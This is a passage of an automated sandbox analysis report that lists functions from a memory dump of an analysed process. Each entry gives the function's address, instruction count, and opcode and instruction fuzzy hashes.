                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 24c43140c7094cb675816f216f978da0386707a3c1f892b1c375ba8009793662
                                                                        • Instruction ID: c30e1b9b9b1215ba9e4dc7af70e622a58a0b25b43a8e5010d8bf36e4ebd43ae7
                                                                        • Opcode Fuzzy Hash: 24c43140c7094cb675816f216f978da0386707a3c1f892b1c375ba8009793662
                                                                        • Instruction Fuzzy Hash: 748160A0A096894FE756EB3DC4597697BD1EF59300F5441BDE88ECB2D3CD2CE8468710
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD067 Relevance: .2, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aab56380fe6e1e072c7476c5360cab6a5167a7dc6d2c35de490a1da8f25ae88b
                                                                        • Instruction ID: bf64266dcaff39a8dfa7aa8d4f12ec98ab96fe1b90fd7d20d1f8bf098326b866
                                                                        • Opcode Fuzzy Hash: aab56380fe6e1e072c7476c5360cab6a5167a7dc6d2c35de490a1da8f25ae88b
                                                                        • Instruction Fuzzy Hash: 20717FA0A09A494FE75AEB2DC4597B977D1EF59300F5441BDE88EC72D3CE2CE8868710
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B0A35 Relevance: .2, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cda69cf03684bcf23da19962f6a5d094f44e720df5782520c86a3938bd5dc3c
                                                                        • Instruction ID: 9dfcb1ec2af7f27c7b70416ff72e34f008c5c7d3acff97870e93dd11fe3bf946
                                                                        • Opcode Fuzzy Hash: 7cda69cf03684bcf23da19962f6a5d094f44e720df5782520c86a3938bd5dc3c
                                                                        • Instruction Fuzzy Hash: 5C61FAB1A19A894FE79ADA3880566F477D2FF89300F4444FEE45EC3283DE28E806C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AD330 Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a189e731232b43abeffd353bfe70670a956a3258da267e18a436dde1c3f0ffe
                                                                        • Instruction ID: 4c00c56771369b27defd8810de50159d4e5dd369cc59eb85bd0e4eeb4f68231b
                                                                        • Opcode Fuzzy Hash: 4a189e731232b43abeffd353bfe70670a956a3258da267e18a436dde1c3f0ffe
                                                                        • Instruction Fuzzy Hash: 6951B3A0A08A494BE75DAB298059779B7D2FF98340F64417DE88FC76D3CD2CEC468254
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A698A Relevance: .2, Instructions: 187COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 33b9881c23f07c8de5071c6bb8296e81f7a862687acddabdfc7801d1b7af461d
                                                                        • Instruction ID: 13ee24ed3b365c9346b2f70c631747e86984cf308a3001ee135e7329c93b8db2
                                                                        • Opcode Fuzzy Hash: 33b9881c23f07c8de5071c6bb8296e81f7a862687acddabdfc7801d1b7af461d
                                                                        • Instruction Fuzzy Hash: DB5124E590EA894FD74AEB78846E2B57BE0EF56300B0840FFE44ECB1A3CD1898158351
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1D71 Relevance: .2, Instructions: 151COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 410767c6c99dec5a4413a93e944489434983c2c25e74093ba9d1df1f5d4387e4
                                                                        • Instruction ID: d129414975e000967541daa79296600bd51d7981d02805d88339aa670241e30c
                                                                        • Opcode Fuzzy Hash: 410767c6c99dec5a4413a93e944489434983c2c25e74093ba9d1df1f5d4387e4
                                                                        • Instruction Fuzzy Hash: 5E518EB1D09A8D8FDB86DF28C489AAA7FE1FF59300F0445BAE459D7252DB34E805CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7D01 Relevance: .1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c123536e4b3eaa7d7ddda79d5e5a4cbbac6647028ea9fca19398d40296ac13c
                                                                        • Instruction ID: 40042959a76d2b6b6005022ce5c7dd6f800de00321ef8a7a39e62fcc000caf17
                                                                        • Opcode Fuzzy Hash: 9c123536e4b3eaa7d7ddda79d5e5a4cbbac6647028ea9fca19398d40296ac13c
                                                                        • Instruction Fuzzy Hash: C14101B050E6C95FE752A738985A6B57FD0EF07364F1409FAE8CECB193D919A802C385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5ABC22 Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bc391b4f8df281d843f223fb22c0586c30dda4b1a2dc6702a5ffda3a9b6ba38e
                                                                        • Instruction ID: f157415fd9cf028032dc37f938badbcaa474d22a317e159a11cfa9f6e1151f8a
                                                                        • Opcode Fuzzy Hash: bc391b4f8df281d843f223fb22c0586c30dda4b1a2dc6702a5ffda3a9b6ba38e
                                                                        • Instruction Fuzzy Hash: 0E41C2B050C6895FEB599F2DD45A6B97BE1EF96310F54016FF88DC3292CA34E842C781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B13B9 Relevance: .1, Instructions: 144COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f985ea7600858b62bab1c560014807ff69b9001d8a5d804f6e329feacc39dfca
                                                                        • Instruction ID: 27900695d9f65d7b79e509737aa52a4185c1149363a89fc71ba459d3e1c22151
                                                                        • Opcode Fuzzy Hash: f985ea7600858b62bab1c560014807ff69b9001d8a5d804f6e329feacc39dfca
                                                                        • Instruction Fuzzy Hash: 86412EF2D0EA854FD7A7CB38D8561B6BFD0EF45310B0401BED48AC7193EA18E8498391
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B17C0 Relevance: .1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7ae54cab4612b07e999957c6fe15d19288c592cfaed49f68b027b455a1192e91
                                                                        • Instruction ID: 8ad4f67b67c9444e59806d31163e482407070e4048b4fe7b5dde2c2ac5f85ae0
                                                                        • Opcode Fuzzy Hash: 7ae54cab4612b07e999957c6fe15d19288c592cfaed49f68b027b455a1192e91
                                                                        • Instruction Fuzzy Hash: 804140B0A1954A8FDBD6DB28C455BBA3791FF45305F5400B9F80EC7192DB29E856C740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7D2B Relevance: .1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b067304151f794ae18e816b7577e71925ded9c38eb475d3c21df4dae9ccbc58a
                                                                        • Instruction ID: 0c120e1706a0e92063d5e03c5c46995a6ca02768f77b50f389908bdff60c1c93
                                                                        • Opcode Fuzzy Hash: b067304151f794ae18e816b7577e71925ded9c38eb475d3c21df4dae9ccbc58a
                                                                        • Instruction Fuzzy Hash: 313135B150D9895FE746E738884E5B53BD1EF56250F1405FEE88EC7193DD29EC028380
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7D30 Relevance: .1, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2376bba2619a912051c16e7782b7a2483e6f4568425bd998c357fa1cdc38c498
                                                                        • Instruction ID: c2d5f3a4e8f29909467e4829339b0866166e79292ac492a11418f777c68ac2b2
                                                                        • Opcode Fuzzy Hash: 2376bba2619a912051c16e7782b7a2483e6f4568425bd998c357fa1cdc38c498
                                                                        • Instruction Fuzzy Hash: CC3124B160D9495FE745F738884E9B67BD5EF9A250F1405FAE88EC7193DD29EC028380
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AB8AD Relevance: .1, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18cd4341c14d72ab1a083ccda6e1d3267ed344ebe7facc542b10b85ab56bfc7c
                                                                        • Instruction ID: a624790fe6637d42a2cb2b18137ea14a088ee1aa3e951fbe0c4ac9dc47e4b470
                                                                        • Opcode Fuzzy Hash: 18cd4341c14d72ab1a083ccda6e1d3267ed344ebe7facc542b10b85ab56bfc7c
                                                                        • Instruction Fuzzy Hash: BC3145B1A0AE4E4FE796E63C849A5757BD1EF9921075901FAE44EC72A3DC14EC038385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AE824 Relevance: .1, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28bd885730bc62e9e9b6697267a8205a07e85fa64f4512bbb9de6cacffd0e7a6
                                                                        • Instruction ID: 01759d1a762277438ae18fe52384edd9091a07d0a3015d8dc90bcd87c427cef2
                                                                        • Opcode Fuzzy Hash: 28bd885730bc62e9e9b6697267a8205a07e85fa64f4512bbb9de6cacffd0e7a6
                                                                        • Instruction Fuzzy Hash: E431FCB290CB1D4FEB58EA29D84F5F977E4EBA5311F00413FE44DD3151EE20A9568B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AE82E Relevance: .1, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f71407a356243754b61a8e716c2cacece945623635592c46c5cc6b9db0202495
                                                                        • Instruction ID: 67b03778f36beeb9333fed75d9231b34959dc1c758283d57c08625e26acb0071
                                                                        • Opcode Fuzzy Hash: f71407a356243754b61a8e716c2cacece945623635592c46c5cc6b9db0202495
                                                                        • Instruction Fuzzy Hash: 9E31D97290CB1C4FDB68EA2CD84E5F977E4EBD5321F00427FD44DD3151DA20A9468B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1FA4 Relevance: .1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ab0f5d36b9a238063af927b4814f5736652afb2a4670216268404f3728763a6
                                                                        • Instruction ID: 3ccab2dbcf92113142e3f0c30b8d793082fc89e53b7cc9bac822ff9219eda8a3
                                                                        • Opcode Fuzzy Hash: 9ab0f5d36b9a238063af927b4814f5736652afb2a4670216268404f3728763a6
                                                                        • Instruction Fuzzy Hash: E8217D92E0D6590BF219663CA8471B57BC1DF96360B18017EE44EC7393EC299C53C355
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A7660 Relevance: .1, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2ad0d15b183c8ecce39ecb364eae9d2e32f9fad9fe8c0d198866abafc01f942
                                                                        • Instruction ID: 3af18dc8ba71993923688f8b236ad75340e7fe2af7b7d9236e04fd2253df222d
                                                                        • Opcode Fuzzy Hash: c2ad0d15b183c8ecce39ecb364eae9d2e32f9fad9fe8c0d198866abafc01f942
                                                                        • Instruction Fuzzy Hash: AC3135B1918A888FD749EF3CC40A2A97BE1FF89315F10007EE44ED3292CA35E802CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1A45 Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b99ac13bc447af9e1a71d9c43cf4f161513342bff753ae943675499a5a1c616
                                                                        • Instruction ID: 637e80c0a430f579dffdded3ad179d6fedabe135da2c85b2382f41ff3c03e3e3
                                                                        • Opcode Fuzzy Hash: 3b99ac13bc447af9e1a71d9c43cf4f161513342bff753ae943675499a5a1c616
                                                                        • Instruction Fuzzy Hash: 1221F9E1D1D94B4FE3EA9238C46A6763AD1EF45311F580179E84EC65E2FE18F881C390
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A68A3 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5109c18ac4675d66815a5230028f1a2c3873030d3cb8cd387a7fe50380cb8072
                                                                        • Instruction ID: 1dc00c823e5863530c3c597510342ee794a9645625c8be88506f279c4111dfc5
                                                                        • Opcode Fuzzy Hash: 5109c18ac4675d66815a5230028f1a2c3873030d3cb8cd387a7fe50380cb8072
                                                                        • Instruction Fuzzy Hash: D331B8DA80F7870FE353D679996E1A57FE0AF0132170800F7E98D871A7EE48A91D4791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AB215 Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 75880ac3a2148340915b00e2fc8bef42562155ddcd310633df479faf090a80b1
                                                                        • Instruction ID: 08a0a333e8507240634526f763add98dafec2c9f6284b647513b120a3ace54c1
                                                                        • Opcode Fuzzy Hash: 75880ac3a2148340915b00e2fc8bef42562155ddcd310633df479faf090a80b1
                                                                        • Instruction Fuzzy Hash: 882106B091C6460FE755DA2CD45DAB57FE1EFA5210F4805BBE88CC71A2D818D9C58381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B0D86 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18bb2df7275bbe8eaf9ff8319f5054036276a903da715d26968beae7de03696d
                                                                        • Instruction ID: 934885c89dfc94cabcee99ab189aa1587cb6086ecad7d5503ec6bb7bff53edac
                                                                        • Opcode Fuzzy Hash: 18bb2df7275bbe8eaf9ff8319f5054036276a903da715d26968beae7de03696d
                                                                        • Instruction Fuzzy Hash: BA21B2C2A1DA890FE796D67C845AAB56BC1FF98300B04417EE44EC35D3EE1CE80A8291
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5AB900 Relevance: .1, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 256610f709af5aa33fd5caec4a1b7b8b23f38afbbb21eb8c1f9321ce96727b09
                                                                        • Instruction ID: 49963b27cee80693990dacafa836a52a81f9022d0b2b002b9602194dc33b53a6
                                                                        • Opcode Fuzzy Hash: 256610f709af5aa33fd5caec4a1b7b8b23f38afbbb21eb8c1f9321ce96727b09
                                                                        • Instruction Fuzzy Hash: 77113FB2A16D1D4FE259E56D884E57572C1EB84310B55027EE40EC33A3DC14FC0382C9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B1595 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a1265832b0509c91a2f7f6adb72de249e5aefbc83126b743a7e62367b74fb21
                                                                        • Instruction ID: 37800ae9a866ff5f76fe0c7d814ae14ed9fba6a72f129b7a7ab4099a306cfdcb
                                                                        • Opcode Fuzzy Hash: 1a1265832b0509c91a2f7f6adb72de249e5aefbc83126b743a7e62367b74fb21
                                                                        • Instruction Fuzzy Hash: D811A04198FAD60FE34757B48C295E23FE5DF8B51070D42EBE486CA4A3D84C898BC361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A709E Relevance: .1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f19b627f3610d54feb39129cae970df66bff8bb6a54633b12584beb7c2a08a88
                                                                        • Instruction ID: c5e7189ea132500719b657055632c64b28b78d69fe90184c4e4c04b90032b7c3
                                                                        • Opcode Fuzzy Hash: f19b627f3610d54feb39129cae970df66bff8bb6a54633b12584beb7c2a08a88
                                                                        • Instruction Fuzzy Hash: F61159A180E7C91FD7539778982D0E53FE0EF87120B0901FBE489CB063DC58580AC762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B19C5 Relevance: .1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4eb846db5f63bed049fb1976cfeb15f5c1401e2110318a3ec188f158488da27
                                                                        • Instruction ID: 20e46e459e930dc0302fc417e908fb262ecd1e8261349babc7cd3d411cd1958e
                                                                        • Opcode Fuzzy Hash: f4eb846db5f63bed049fb1976cfeb15f5c1401e2110318a3ec188f158488da27
                                                                        • Instruction Fuzzy Hash: E2117C2158E6D55FC34397749C24AD27FE5DE8B21030A01EBE08ACB5A3C91D9947C761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B0CFD Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29fcee351e695fa21bf80655b0bce6aef9ec1a39fa3b981c9c2c85f413d73e87
                                                                        • Instruction ID: 31f15b61c7e36bb99842c4361cc25ea9de5923a4f28380b1d5575c47fcd63799
                                                                        • Opcode Fuzzy Hash: 29fcee351e695fa21bf80655b0bce6aef9ec1a39fa3b981c9c2c85f413d73e87
                                                                        • Instruction Fuzzy Hash: 62012BC391E94A0EE6A7867CA4575756FC1FFD0250B484279E88ED71D2EE09F4028284
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5B0C61 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd01ca9978a20d0786033a70aeaabebec1a34ba3aef0c72f5d5fcedd2cfc2421
                                                                        • Instruction ID: c9a814a0b584f9401fd248abeae1cfc9bfcb0940c8542169e7945913579983d4
                                                                        • Opcode Fuzzy Hash: bd01ca9978a20d0786033a70aeaabebec1a34ba3aef0c72f5d5fcedd2cfc2421
                                                                        • Instruction Fuzzy Hash: 5C1163B1A19B494FE399DF3880866A5B7D2FF98304F5054BDA48EC3292EE25A402C701
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A75BA Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6fc17ebad79a558e1f26856ca506ef2fdf13aeaa024690185c22caea0aeb55b0
                                                                        • Instruction ID: a2376d5ccac85baf048b4f30fcc7fb98581e24e95e0094b1896cc9a63d1f7db0
                                                                        • Opcode Fuzzy Hash: 6fc17ebad79a558e1f26856ca506ef2fdf13aeaa024690185c22caea0aeb55b0
                                                                        • Instruction Fuzzy Hash: D911049195E7C60FE393977888192617FE1DF47120B0944FFD8CACA5A3D90DD846C342
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFBAC5A92F1 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
